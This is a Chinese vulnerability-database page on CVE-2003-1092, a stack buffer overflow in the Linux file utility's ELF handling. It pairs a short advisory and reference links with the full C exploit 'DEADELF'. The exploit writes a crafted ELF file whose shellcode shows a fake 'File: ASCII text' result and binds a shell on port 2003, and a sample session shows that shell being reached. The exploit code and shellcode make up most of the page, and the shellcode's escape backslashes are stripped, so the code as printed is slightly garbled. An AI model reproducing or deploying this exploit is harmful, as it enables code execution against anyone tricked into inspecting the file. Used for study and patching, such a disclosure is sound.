file工具本地缓冲区溢出漏洞

file工具本地缓冲区溢出漏洞

漏洞ID 1107234 漏洞类型 设计错误
发布时间 2003-03-06 更新时间 2005-10-20
图片[1]-file工具本地缓冲区溢出漏洞-安全小百科CVE编号 CVE-2003-1092
图片[2]-file工具本地缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200312-187
漏洞平台 Linux CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/22326
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-187
|漏洞详情
file(1)是一款查看文件类型的工具。file(1)命令存在一个缓冲区溢出漏洞,本地攻击者可以利用这个漏洞以执行用户权限在系统上执行任意指令。问题存在于readelf.c中的587行tryelf()函数的doshn()调用中:doshn(class,swap,fd,getu32(swap,elfhdr.e_shoff),getu16(swap,elfhdr.e_shnum),getu16(swap,elfhdr.e_shentsize));doshn()’elfhdr.e_shentsize’最后一个参数将在之后用于readelf.c133行的read()函数中:if(read(fd,sh_addr,size)==-1)read()调用会拷贝’size’字节到readelf.c92行定义的’sh_addr’变量中:#definesh_addr(class==ELFCLASS32?(void*)&sh32:(void*)&sh64)用于read()函数的缓冲区大小只有0x20(32)字节,通过提供0x28(40)字节的’size’参数可导致覆盖堆栈中的EBP和EIP寄存器而以其他用户权限执行任意代码。用户可以构建恶意文件诱使其他用户来分析,导致发生缓冲区溢出,而以执行用户权限执行任意指令。
|漏洞EXP
source: http://www.securityfocus.com/bid/7009/info

It has been reported that a memory allocation issue exists the file program. Although details of this issue are currently unavailable, it is likely that this issue could be exploited to cause a denial of service condition, and potentially execute code as the user of the file utility. 

/*
   __________________
/   Black Sand Project
   __________________
/
   Created by CrZ [[email protected]] LimpidByte [lbyte.void.ru] /06.03.2003/
/
   Bug discovered by iDEFENCE: http://www.idefense.com/advisory/03.04.03.txt
/   
   program name: DEADELF
/
   description: Exploit for file program <= 3.39
/
   info: program create file-exploit and when you 
/   make "file /path/to/this/file-exploit" shell
   will open on 2003 port.
/
   Usage: ./85deadelf <file-exploit> [return address]
/
   Example of work:
/
	[crz@blacksand crz]$ gcc -o 85deadelf 85deadelf.c
/	[crz@blacksand crz]$ ./85deadelf deadelf
	[+] Creating a evil file deadelf!
/	[+] Using address of shellcode = 0xbfffbd40
	[crz@blacksand crz]$ file deadelf
/	File: ASCII text
	[crz@blacksand crz]$ telnet localhost 2003
/	Trying 127.0.0.1...
	Connected to blacksand (127.0.0.1).
/	Escape character is '^]'.
	id;
/	uid=500(crz) gid=500(crz) groups=500(crz)
	: command not found
/	exit;
	Connection closed by foreign host.
/	[crz@blacksand crz]$

/   Tested against: file-3.37 (RedHat8.0)
		    file-3.38 (RedHat8.0)
*/


#include <fcntl.h>
#include <elf.h>
#include <stdio.h>


void usage(char *prog) {

	printf("nCreated by CrZ [[email protected]] Limpid Byte [lbyte.void.ru]n");
	printf("Usage: %s <name of evil file> [return address]nn",prog);
	exit(0);
}

int main(int argc, char **argv) {
	
/* 
   a simple shellcode that show fake result of file program & bind
/   shell on 2003 port by CrZ
*/
	
char shellcode[]=
	"x31xc0x31xdbx53xb3x01x50" /* write(1,"File: ASCII text");*/
	"x68x01x01x0ax0dx68x74x65"
	"x78x74x68x43x49x49x20x68"
	"x3ax20x41x53x68x46x69x6c"
	"x65x89xe1xb2x18xb0x04xcdx80"
        /* bind shell on 2003 port */
        "x31xc0x89xc3xb0x02xcdx80x38xc3x74x05x8dx43x01xcdx80"
        "x31xc0x89x45x10x40x89xc3x89x45x0cx40x89x45x08x8dx4d"
        "x08xb0x66xcdx80x89x45x08x43x66x89x5dx14x66xc7x45x16"
        "x07xd3x31xd2x89x55x18x8dx55x14x89x55x0cxc6x45x10x10"
        "xb0x66xcdx80x40x89x45x0cx43x43xb0x66xcdx80x43x89x45"
        "x0cx89x45x10xb0x66xcdx80x89xc3x31xc9xb0x3fxcdx80x41"
        "x80xf9x03x75xf6x31xd2x52x68x6ex2fx73x68x68x2fx2fx62"
        "x69x89xe3x52x53x89xe1xb0x0bxcdx80";
	
	int fd,i;
	Elf32_Ehdr elfhdr;
	long xret=0xbfffbd40;
	char *evilfile="bl00mps";
	char tmp[100];
	
	if(!argv[1]) usage(argv[0]);
	else evilfile=argv[1];
	if(argv[2]) sscanf(argv[2],"0x%x",&xret);
	
	printf("[+] Creating a evil file %s!n",evilfile);
	printf("[+] Using address of shellcode = 0x%xn",xret);	
	
	sprintf(tmp,"echo>%s",evilfile);
	system(tmp);
	fd=open(evilfile,O_WRONLY);

	bzero(&elfhdr,sizeof elfhdr );
	elfhdr.e_type=1; //type should by NOT ET_CORE (4) & NOT ET_EXEC (2)
	sprintf(elfhdr.e_ident,"x7fx45x4cx46x01x01x01"); //ELF32 FORMAT
	elfhdr.e_machine=1;
	elfhdr.e_version=1;
	elfhdr.e_entry=0;
	elfhdr.e_phoff=0;
	elfhdr.e_shoff=0;
	elfhdr.e_flags=0;
	elfhdr.e_ehsize=0;
	elfhdr.e_phentsize=0xfff; //define size for read()
	elfhdr.e_phnum=1; //this is for stop for() loop when read()
	elfhdr.e_shentsize=0xfff; //define size for read()
	elfhdr.e_shnum=1; //this is for stop for() loop when read()
	elfhdr.e_shstrndx=0;
	write(fd,&elfhdr,sizeof(elfhdr));
	
	for(i=0;i<20;i++) write(fd,&xret,4); //write new return address
	for(i=0;i<6000;i++) write(fd,"x90",1); //write nops
	write(fd,&shellcode,sizeof shellcode); //write shellcode

	close(fd);

	
	return 0;	
}
|参考资料

来源:US-CERTVulnerabilityNote:VU#100937
名称:VU#100937
链接:http://www.kb.cert.org/vuls/id/100937
来源:XF
名称:file-afctr-memory-allocation(11488)
链接:http://xforce.iss.net/xforce/xfdb/11488
来源:BID
名称:7009
链接:http://www.securityfocus.com/bid/7009
来源:OPENPKG
名称:OpenPKG-SA-2003.017
链接:http://www.securityfocus.com/archive/1/313847
来源:NSFOCUS
名称:4500
链接:http://www.nsfocus.net/vulndb/4500

相关推荐: Sambar Server File Disclosure Vulnerability

Sambar Server File Disclosure Vulnerability 漏洞ID 1100558 漏洞类型 Input Validation Error 发布时间 2003-03-27 更新时间 2003-03-27 CVE编号 N/A CNN…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享